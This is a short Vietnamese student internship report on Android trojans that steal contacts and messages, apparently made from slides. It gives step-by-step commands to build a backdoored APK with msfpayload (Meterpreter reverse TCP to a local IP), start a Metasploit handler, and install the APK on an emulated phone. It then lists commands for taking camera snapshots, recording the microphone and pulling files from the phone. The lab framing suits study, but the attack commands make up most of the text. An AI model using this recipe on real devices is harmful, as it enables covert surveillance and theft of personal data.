1. Sinh viên thực hiện : NGUYỄN QUỐC VƯƠNG . Lớp CNTT . Ca sáng 3 – 5 - 7
Báo cáo thực tập
Đề tài 5 : Nghiên cứu các Trojan ,Malware cho phép đánh cắp dữ liệu như danh sách contact ,
tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài
NGHIÊN CỨU CƠ CHẾ TẠO MÃ ĐỘC TRÊN KALI LINUX
- Đầu tiên
, kiểm tra địa chỉ IP bằng : ifconfig
Địa chỉ IP : 192.168.1.14
- Khởi động terminal và gõ dòng lệnh sau:
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.14 lport=8080 R >
/root/Desktop/test.apk
2. - Máy sẽ tạo 1 file .apk ở bên ngoài desktop , kiểm tra kích thước của file để chắc là file đã
tạo thành công
3. - Tiếp theo gõ lệnh : msfconsole
- Sau khi msfconsole load xong , ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ
lệnh sau:
Use exploit/multi/handler
Set payload/meterpreter/reverse_tcp
Set lhost 192.168.1.14 – Địa chỉ IP đã kiểm tra ban đầu
Set lport 8080 – nhập port giống với khi tạo payload ở trên
Exploit
- Sau đó màn hình sẽ hiện ra như bên dưới , lúc này đang chờ 1 máy android mở backdoor.
4. - Thử giả lập 1 điện thoại và tải file test.apk về và tiến hành cài đặt :
5. - Sau khi cài đặt hoàn tất thì việc kết nối với 1 android đã được thực hiện , lúc này ở console
xuất hiện :
6. - Ta có thể gõ lệnh help để biết được các lệnh :
7. - Có một số lệnh cơ bản như
Để xem thông tin máy : sysinfo
Để sử dụng camera: webcam_list (xem danh sách camera)
Webcam_snap x (sử dụng camera của android)
Để ghi âm : record_mic
Lấy file từ sdcard: cd/sdcard và ls (để xem danh sách thư mục,file)
cd/sdcard/download (để tải về máy )